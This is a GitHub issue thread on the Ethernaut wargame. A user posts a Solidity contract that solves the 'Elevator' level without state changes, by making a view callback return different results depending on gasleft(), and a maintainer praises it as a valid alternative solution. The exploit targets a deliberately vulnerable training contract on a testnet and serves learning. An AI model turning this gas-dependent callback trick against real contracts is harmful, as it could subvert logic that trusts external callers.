### ISSUE TITLE
Found another soluation for Elevator(without modify state)

### ISSUE THREAD

**Issue by manxiaqu** [OpenZeppelin/ethernaut#65]
I pass the Elevator by another solution without modify the state,  so it is possible for one to pass something like "Elevator" through the function will not change the state. Here is my code(not the original code published on ROPSTEN) and instance 

```solidity
pragma solidity ^0.4.0;
contract GET {
    address addr;
    uint256 gasAmount = 100361;
    function GET() public {
        addr = 0x3359cdfc05ee2569458f6b6f52e721776cb5205e; //instance address
    }
    
    function isLastFloor(uint256 amount) public view returns(bool) {
        if (gasleft() > amount) {
            return true;
        } else {
            return false;
        }
    }
    
    // You can pass a amount between gasleft() first and gasleft() sencond
    // It will also pass the Elevator
    function send(uint256 amount) public {
        addr.gas(gasAmount).call(bytes4("goTo(uint256)"), amount);
    }
}
```

Instance Address: 0x3359cdfc05ee2569458f6b6f52e721776cb5205e
Success Tx Hash: 0xf367b6daaa9ffb2fbe830f25ddcce47b75e547ffc6cb6bec91b3b35d1936cc71
Contract Address: 0x0BfAFDB9E0eBC4CBB58c5AC34b4F83c0368F0b17;(original code lost of not saving)

In order to get the right amount, you can use "geth debugtrace" tools on ropsten.etherscan.io.
Any thought about this.

**Comment by ajsantander** [comment]
I first thought this was a bug, but it's actually a very clever alternative way to solve the level. Nice!

Would you consider making a PR to the level's completed description? It would be nice to mention this alternative path there.
https://github.com/OpenZeppelin/ethernaut/blob/master/gamedata/descriptions/levels/elevator_complete.md
